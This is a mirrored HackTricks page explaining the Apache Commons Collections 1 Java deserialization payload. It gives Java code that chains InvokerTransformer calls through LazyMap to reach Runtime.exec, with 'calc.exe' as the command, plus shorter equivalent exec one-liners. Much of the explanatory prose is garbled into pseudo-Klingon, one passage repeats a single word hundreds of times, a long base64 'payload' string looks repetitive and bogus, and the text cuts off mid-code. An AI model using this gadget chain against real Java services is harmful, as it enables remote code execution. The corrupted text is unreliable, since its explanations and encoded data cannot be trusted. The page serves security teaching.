mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 12:43:23 +00:00
246 lines
48 KiB
Markdown
246 lines
48 KiB
Markdown
# CommonsCollection1 Payload - Java Transformers to Rutime exec() and Thread Sleep
|
|
|
|
<details>
|
|
|
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|
|
|
|
## Java Transformers to Rutime exec()
|
|
|
|
In several places you can find a java deserialization payload that uses transformers from Apache common collections like the following one:
|
|
```java
|
|
import org.apache.commons.*;
|
|
import org.apache.commons.collections.*;
|
|
import org.apache.commons.collections.functors.*;
|
|
import org.apache.commons.collections.map.*;
|
|
import java.io.*;
|
|
import java.lang.reflect.InvocationTargetException;
|
|
import java.util.Map;
|
|
import java.util.HashMap;
|
|
|
|
public class CommonsCollections1PayloadOnly {
|
|
public static void main(String... args) {
|
|
String[] command = {"calc.exe"};
|
|
final Transformer[] transformers = new Transformer[]{
|
|
new ConstantTransformer(Runtime.class), //(1)
|
|
new InvokerTransformer("getMethod",
|
|
new Class[]{ String.class, Class[].class},
|
|
new Object[]{"getRuntime", new Class[0]}
|
|
), //(2)
|
|
new InvokerTransformer("invoke",
|
|
new Class[]{Object.class, Object[].class},
|
|
new Object[]{null, new Object[0]}
|
|
), //(3)
|
|
new InvokerTransformer("exec",
|
|
new Class[]{String.class},
|
|
command
|
|
) //(4)
|
|
};
|
|
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
|
|
Map map = new HashMap<>();
|
|
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
|
|
|
|
//Execute gadgets
|
|
lazyMap.get("anything");
|
|
}
|
|
}
|
|
```
|
|
qaStaHvIS java deserialization payloads Daqaw'a' 'e' vItlhutlh. 'Ivqu' java **Transformer** **class** **ghItlh** 'ej **ghItlh** **'e'** **transform**.\
|
|
**Payload** **executed** **equivalent** **'e'** **interesting** **to know** **that**:
|
|
|
|
```java
|
|
import java.io.*;
|
|
import java.util.Base64;
|
|
|
|
public class Main {
|
|
public static void main(String[] args) throws Exception {
|
|
String payload = "rO0ABXNyAB5qYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvcmllcwEABmJpbmFyeVN0cmVhbXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wABnJ1bGVzY2FwZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAB3N0YWNrVHJhbnNwb3J0ABBMamF2YS91dGlsL1RocmVhZDt4cHNyACBqYXZhLnV0aWwuSGFzaE1hcJAAAAAAAAAABDAAVAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAADAAAAAQAAABAAAAAIAAAABAAAAAQAAAAUAAAAGAAAAAQAAABwAAAABAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAAQAAABwAAAAHAAAAAgAAAAIAAAADAAAAAQAAABEAAAACAAAAAQAAABQAAAAFAAAAA
|
|
```java
|
|
Runtime.getRuntime().exec(new String[]{"calc.exe"});
|
|
```
|
|
**vaj** **vItlhutlh** **vaj** **vItlhutlh**, **nuq** **vItlhutlh** **vaj** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **
|
|
```java
|
|
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
|
|
```
|
|
### Qatlh
|
|
|
|
So, Qatlh je first payload presented equivalent to those "simple" one-liners?
|
|
|
|
**First** of all, Qatlh can notice in the payload that a **chain (array) of transforms are created**:
|
|
```java
|
|
String[] command = {"calc.exe"};
|
|
final Transformer[] transformers = new Transformer[]{
|
|
//(1) - Get gadget Class (from Runtime class)
|
|
new ConstantTransformer(Runtime.class),
|
|
|
|
//(2) - Call from gadget Class (from Runtime class) the function "getMetod" to obtain "getRuntime"
|
|
new InvokerTransformer("getMethod",
|
|
new Class[]{ String.class, Class[].class},
